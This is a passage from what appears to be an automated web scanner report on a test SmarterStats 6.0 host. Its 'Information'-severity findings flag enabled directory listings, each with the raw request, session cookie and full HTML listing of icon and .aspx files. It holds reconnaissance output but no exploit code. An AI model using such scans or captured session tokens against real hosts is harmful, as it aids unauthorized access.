Thursday, October 07, 2010 01:00 PM 686 <A href="quoteReply.gif">quoteReply.gif</A>
Thursday, October 07, 2010 01:00 PM 718 <A href="rawContent.gif">rawContent.gif</A>
Thursday, October 07, 2010 01:00 PM 654 <A href="unlink.gif">unlink.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.58. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/iconmenu/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/iconmenu/

Request

GET /App_Themes/Default/images/icons/iconmenu/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:44 GMT
Content-Length: 1707
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/iconmenu/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/iconmenu/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 4,183 <A href="Hover.png">Hover.png</A>
Thursday, October 07, 2010 01:00 PM 6,540 <A href="Selected.png">Selected.png</A>
Thursday, October 07, 2010 01:00 PM 6,479 <A href="SelectedHover.png">SelectedHover.png</A>
Thursday, October 07, 2010 01:00 PM 3,561 <A href="Unselected.png">Unselected.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.59. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/iconmenustats/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/iconmenustats/

Request

GET /App_Themes/Default/images/icons/iconmenustats/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:46 GMT
Content-Length: 1717
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/iconmenustats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/iconmenustats/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 3,138 <A href="Hover.png">Hover.png</A>
Thursday, October 07, 2010 01:00 PM 5,164 <A href="Selected.png">Selected.png</A>
Thursday, October 07, 2010 01:00 PM 5,328 <A href="SelectedHover.png">SelectedHover.png</A>
Thursday, October 07, 2010 01:00 PM 2,439 <A href="Unselected.png">Unselected.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.60. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/misc/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/misc/

Request

GET /App_Themes/Default/images/misc/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:41 GMT
Content-Length: 7465
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/misc/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/misc/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,616 <A href="attDoc.gif">attDoc.gif</A>
Thursday, October 07, 2010 01:00 PM 1,618 <A href="attFile.gif">attFile.gif</A>
Thursday, October 07, 2010 01:00 PM 1,614 <A href="attPdf.gif">attPdf.gif</A>
Thursday, October 07, 2010 01:00 PM 1,639 <A href="attZip.gif">attZip.gif</A>
Thursday, October 07, 2010 01:00 PM 844 <A href="btnListRemove.gif">btnListRemove.gif</A>
Thursday, October 07, 2010 01:00 PM 836 <A href="checkmark.gif">checkmark.gif</A>
Thursday, October 07, 2010 01:00 PM 610 <A href="clear.png">clear.png</A>
Thursday, October 07, 2010 01:00 PM 1,047 <A href="close.gif">close.gif</A>
Thursday, October 07, 2010 01:00 PM 381 <A href="CloseBtn_Disabled.gif">CloseBtn_Disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 380 <A href="CloseBtn_Enabled.gif">CloseBtn_Enabled.gif</A>
Thursday, October 07, 2010 01:00 PM 689 <A href="cloudy.png">cloudy.png</A>
Thursday, October 07, 2010 01:00 PM 3,982 <A href="DialogToolbarButtonSprites.gif">DialogToolbarButtonSprites.gif</A>
Thursday, October 07, 2010 01:00 PM 834 <A href="Down.gif">Down.gif</A>
Thursday, October 07, 2010 01:00 PM 834 <A href="DownDisabled.gif">DownDisabled.gif</A>
Thursday, October 07, 2010 01:00 PM 1,340 <A href="DownloadAll.gif">DownloadAll.gif</A>
Thursday, October 07, 2010 01:00 PM 484 <A href="filterClearBtn.png">filterClearBtn.png</A>
Thursday, October 07, 2010 01:00 PM 1,308 <A href="filterClearBtnBlue.png">filterClearBtnBlue.png</A>
Thursday, October 07, 2010 01:00 PM 754 <A href="filterGoBtn.png">filterGoBtn.png</A>
Thursday, October 07, 2010 01:00 PM 1,394 <A href="filterGoBtnBlue.png">filterGoBtnBlue.png</A>
Thursday, October 07, 2010 01:00 PM 344 <A href="Forward.gif">Forward.gif</A>
Thursday, October 07, 2010 01:00 PM 517 <A href="Green.gif">Green.gif</A>
Thursday, October 07, 2010 01:00 PM 370 <A href="Green_Checkmark.png">Green_Checkmark.png</A>
Thursday, October 07, 2010 01:00 PM 816 <A href="HorizontalBorderLine.gif">HorizontalBorderLine.gif</A>
Thursday, October 07, 2010 01:00 PM 1,376 <A href="Invitation.png">Invitation.png</A>
Thursday, October 07, 2010 01:00 PM 1,553 <A href="LoadingIndicator.gif">LoadingIndicator.gif</A>
Thursday, October 07, 2010 01:00 PM 375 <A href="Merge.gif">Merge.gif</A>
Thursday, October 07, 2010 01:00 PM 887 <A href="NavLeft.png">NavLeft.png</A>
Thursday, October 07, 2010 01:00 PM 894 <A href="NavRight.png">NavRight.png</A>
Thursday, October 07, 2010 01:00 PM 7,564 <A href="nav_logo4.png">nav_logo4.png</A>
Thursday, October 07, 2010 01:00 PM 380 <A href="Note.gif">Note.gif</A>
Thursday, October 07, 2010 01:00 PM 70 <A href="Paperclip.gif">Paperclip.gif</A>
Thursday, October 07, 2010 01:00 PM 776 <A href="partial_cloudy.png">partial_cloudy.png</A>
Thursday, October 07, 2010 01:00 PM 56 <A href="Priority_High.gif">Priority_High.gif</A>
Thursday, October 07, 2010 01:00 PM 65 <A href="Priority_Low.gif">Priority_Low.gif</A>
Thursday, October 07, 2010 01:00 PM 51 <A href="Priority_Normal.gif">Priority_Normal.gif</A>
Thursday, October 07, 2010 01:00 PM 70 <A href="Priority_Urgent.gif">Priority_Urgent.gif</A>
Thursday, October 07, 2010 01:00 PM 526 <A href="rain.png">rain.png</A>
Thursday, October 07, 2010 01:00 PM 86 <A href="RecurringSM.gif">RecurringSM.gif</A>
Thursday, October 07, 2010 01:00 PM 516 <A href="Red.gif">Red.gif</A>
Thursday, October 07, 2010 01:00 PM 780 <A href="refresh_icon.png">refresh_icon.png</A>
Thursday, October 07, 2010 01:00 PM 535 <A href="RemoveAttch.png">RemoveAttch.png</A>
Thursday, October 07, 2010 01:00 PM 848 <A href="right.gif">right.gif</A>
Thursday, October 07, 2010 01:00 PM 863 <A href="right2.gif">right2.gif</A>
Thursday, October 07, 2010 01:00 PM 66 <A href="SmallPaperclip.gif">SmallPaperclip.gif</A>
Thursday, October 07, 2010 01:00 PM 2,202 <A href="sm_logo.png">sm_logo.png</A>
Thursday, October 07, 2010 01:00 PM 741 <A href="snow.png">snow.png</A>
Thursday, October 07, 2010 01:00 PM 711 <A href="storm.png">storm.png</A>
Thursday, October 07, 2010 01:00 PM 2,243 <A href="st_logo.PNG">st_logo.PNG</A>
Thursday, October 07, 2010 01:00 PM 295 <A href="swfupload-button.png">swfupload-button.png</A>
Thursday, October 07, 2010 01:00 PM 408 <A href="TicketAssigned.gif">TicketAssigned.gif</A>
Thursday, October 07, 2010 01:00 PM 325 <A href="TicketDeleted.gif">TicketDeleted.gif</A>
Thursday, October 07, 2010 01:00 PM 848 <A href="TitleDropDown.gif">TitleDropDown.gif</A>
Thursday, October 07, 2010 01:00 PM 834 <A href="tooltipClose.gif">tooltipClose.gif</A>
Thursday, October 07, 2010 01:00 PM 349 <A href="Transfer.gif">Transfer.gif</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Tree/">Tree</A>
Thursday, October 07, 2010 01:00 PM 833 <A href="Up.gif">Up.gif</A>
Thursday, October 07, 2010 01:00 PM 833 <A href="UpDisabled.gif">UpDisabled.gif</A>
Thursday, October 07, 2010 01:00 PM 484 <A href="UpgradeArrow.png">UpgradeArrow.png</A>
Thursday, October 07, 2010 01:00 PM 890 <A href="UpperRightCheckmarkBG.gif">UpperRightCheckmarkBG.gif</A>
Thursday, October 07, 2010 01:00 PM 836 <A href="whitecheckmark.gif">whitecheckmark.gif</A>
Thursday, October 07, 2010 01:00 PM 236 <A href="Ylw-Star_emp.gif">Ylw-Star_emp.gif</A>
Thursday, October 07, 2010 01:00 PM 573 <A href="Ylw-Star_full.gif">Ylw-Star_full.gif</A>
Thursday, October 07, 2010 01:00 PM 359 <A href="Ylw-Star_half.gif">Ylw-Star_half.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.61. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/misc/tree/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/misc/tree/

Request

GET /App_Themes/Default/images/misc/tree/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:39 GMT
Content-Length: 1989
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/misc/tree/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/misc/tree/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/misc/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 67 <A href="BottomLine.gif">BottomLine.gif</A>
Thursday, October 07, 2010 01:00 PM 1,940 <A href="FirstNodeSpan.gif">FirstNodeSpan.gif</A>
Thursday, October 07, 2010 01:00 PM 71 <A href="MiddleLine.gif">MiddleLine.gif</A>
Thursday, October 07, 2010 01:00 PM 114 <A href="NodeSpan.gif">NodeSpan.gif</A>
Thursday, October 07, 2010 01:00 PM 214 <A href="PlusMinus.gif">PlusMinus.gif</A>
Thursday, October 07, 2010 01:00 PM 844 <A href="SingleLine.gif">SingleLine.gif</A>
Thursday, October 07, 2010 01:00 PM 68 <A href="TopLine.gif">TopLine.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.62. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/skin/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/skin/

Request

GET /App_Themes/Default/images/skin/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:38 GMT
Content-Length: 5435
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/skin/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/skin/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 117 <A href="ActionBar_Hover.png">ActionBar_Hover.png</A>
Thursday, October 07, 2010 01:00 PM 886 <A href="ActionBar_Tile.png">ActionBar_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 921 <A href="ButtonHover_Left.png">ButtonHover_Left.png</A>
Thursday, October 07, 2010 01:00 PM 974 <A href="ButtonHover_Tile.png">ButtonHover_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 915 <A href="Button_Left.png">Button_Left.png</A>
Thursday, October 07, 2010 01:00 PM 945 <A href="Button_Tile.png">Button_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 1,915 <A href="DropShadow.png">DropShadow.png</A>
Thursday, October 07, 2010 01:00 PM 5,877 <A href="DropShadowTrans.png">DropShadowTrans.png</A>
Thursday, October 07, 2010 01:00 PM 907 <A href="SearchBar_Cancel.png">SearchBar_Cancel.png</A>
Thursday, October 07, 2010 01:00 PM 907 <A href="SearchBar_CancelGrey.png">SearchBar_CancelGrey.png</A>
Thursday, October 07, 2010 01:00 PM 939 <A href="SearchBar_Search.png">SearchBar_Search.png</A>
Thursday, October 07, 2010 01:00 PM 939 <A href="SearchBar_SearchGrey.png">SearchBar_SearchGrey.png</A>
Thursday, October 07, 2010 01:00 PM 134 <A href="SearchBar_Tile.png">SearchBar_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 895 <A href="SearchBoxGrey_Left.png">SearchBoxGrey_Left.png</A>
Thursday, October 07, 2010 01:00 PM 895 <A href="SearchBoxGrey_Right.png">SearchBoxGrey_Right.png</A>
Thursday, October 07, 2010 01:00 PM 860 <A href="SearchBoxGrey_Tile.png">SearchBoxGrey_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 907 <A href="SearchBox_Left.png">SearchBox_Left.png</A>
Thursday, October 07, 2010 01:00 PM 907 <A href="SearchBox_Right.png">SearchBox_Right.png</A>
Thursday, October 07, 2010 01:00 PM 860 <A href="SearchBox_Tile.png">SearchBox_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 887 <A href="SectionHeader_Left.png">SectionHeader_Left.png</A>
Thursday, October 07, 2010 01:00 PM 889 <A href="SectionHeader_Right.png">SectionHeader_Right.png</A>
Thursday, October 07, 2010 01:00 PM 876 <A href="SectionHeader_Tile.png">SectionHeader_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 861 <A href="TabBar_Tile.png">TabBar_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 1,409 <A href="Tab_Tile.png">Tab_Tile.png</A>
Thursday, October 07, 2010 01:00 PM 853 <A href="Window_BottomSolid.png">Window_BottomSolid.png</A>
Thursday, October 07, 2010 01:00 PM 98 <A href="Window_LeftBottom.png">Window_LeftBottom.png</A>
Thursday, October 07, 2010 01:00 PM 862 <A href="Window_LeftBottomSolid.png">Window_LeftBottomSolid.png</A>
Thursday, October 07, 2010 01:00 PM 852 <A href="Window_LeftSolid.png">Window_LeftSolid.png</A>
Thursday, October 07, 2010 01:00 PM 1,144 <A href="Window_LeftTop.png">Window_LeftTop.png</A>
Thursday, October 07, 2010 01:00 PM 99 <A href="Window_RightBottom.png">Window_RightBottom.png</A>
Thursday, October 07, 2010 01:00 PM 865 <A href="Window_RightBottomSolid.png">Window_RightBottomSolid.png</A>
Thursday, October 07, 2010 01:00 PM 853 <A href="Window_RightSolid.png">Window_RightSolid.png</A>
Thursday, October 07, 2010 01:00 PM 144 <A href="Window_RightTop.png">Window_RightTop.png</A>
Thursday, October 07, 2010 01:00 PM 1,428 <A href="Wizard_Confirmation.gif">Wizard_Confirmation.gif</A>
Thursday, October 07, 2010 01:00 PM 1,347 <A href="Wizard_DataEntry.gif">Wizard_DataEntry.gif</A>
Thursday, October 07, 2010 01:00 PM 1,605 <A href="Wizard_Gear.gif">Wizard_Gear.gif</A>
Thursday, October 07, 2010 01:00 PM 1,221 <A href="Wizard_Information.gif">Wizard_Information.gif</A>
Thursday, October 07, 2010 01:00 PM 1,296 <A href="Wizard_Warning.gif">Wizard_Warning.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.63. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/social_icons/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/social_icons/

Request

GET /App_Themes/Default/images/social_icons/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:00 GMT
Content-Length: 2973
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/social_icons/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/social_icons/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 412 <A href="blinklist.png">blinklist.png</A>
Thursday, October 07, 2010 01:00 PM 147 <A href="blogmarks.png">blogmarks.png</A>
Thursday, October 07, 2010 01:00 PM 1,068 <A href="co.mments.gif">co.mments.gif</A>
Thursday, October 07, 2010 01:00 PM 103 <A href="delicious.png">delicious.png</A>
Thursday, October 07, 2010 01:00 PM 291 <A href="digg.png">digg.png</A>
Thursday, October 07, 2010 01:00 PM 387 <A href="Diigo.gif">Diigo.gif</A>
Thursday, October 07, 2010 01:00 PM 154 <A href="facebook.png">facebook.png</A>
Thursday, October 07, 2010 01:00 PM 362 <A href="feedmelinks.png">feedmelinks.png</A>
Thursday, October 07, 2010 01:00 PM 943 <A href="friendfeed.png">friendfeed.png</A>
Thursday, October 07, 2010 01:00 PM 983 <A href="myspace.png">myspace.png</A>
Thursday, October 07, 2010 01:00 PM 138 <A href="netvouz.png">netvouz.png</A>
Thursday, October 07, 2010 01:00 PM 131 <A href="newsvine.png">newsvine.png</A>
Thursday, October 07, 2010 01:00 PM 980 <A href="reddit.png">reddit.png</A>
Thursday, October 07, 2010 01:00 PM 1,026 <A href="spurl.png">spurl.png</A>
Thursday, October 07, 2010 01:00 PM 780 <A href="StumbleUpon.png">StumbleUpon.png</A>
Thursday, October 07, 2010 01:00 PM 1,074 <A href="Twitter.gif">Twitter.gif</A>
Thursday, October 07, 2010 01:00 PM 294 <A href="wists.png">wists.png</A>
Thursday, October 07, 2010 01:00 PM 186 <A href="yahoo.png">yahoo.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.64. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/stats/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/stats/

Request

GET /App_Themes/Default/images/stats/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:50 GMT
Content-Length: 1396
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/stats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/stats/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,371 <A href="Percents.gif">Percents.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.65. http://vulnerable.smarterstats.6.0.host:9999/Client/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/

Request

GET /Client/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx/GetReportProgress
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:28:22 GMT
Content-Length: 4189
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Client/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Client/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 3,675 <A href="frmCustomReport.aspx">frmCustomReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 4,692 <A href="frmCustomReportItem.aspx">frmCustomReportItem.aspx</A>
Thursday, October 07, 2010 01:00 PM 971 <A href="frmCustomReports.aspx">frmCustomReports.aspx</A>
Thursday, October 07, 2010 01:00 PM 505 <A href="frmDataMineStart.aspx">frmDataMineStart.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,099 <A href="frmEmailReport.aspx">frmEmailReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,232 <A href="frmEmailReports.aspx">frmEmailReports.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,503 <A href="frmEmailReportSettings.aspx">frmEmailReportSettings.aspx</A>
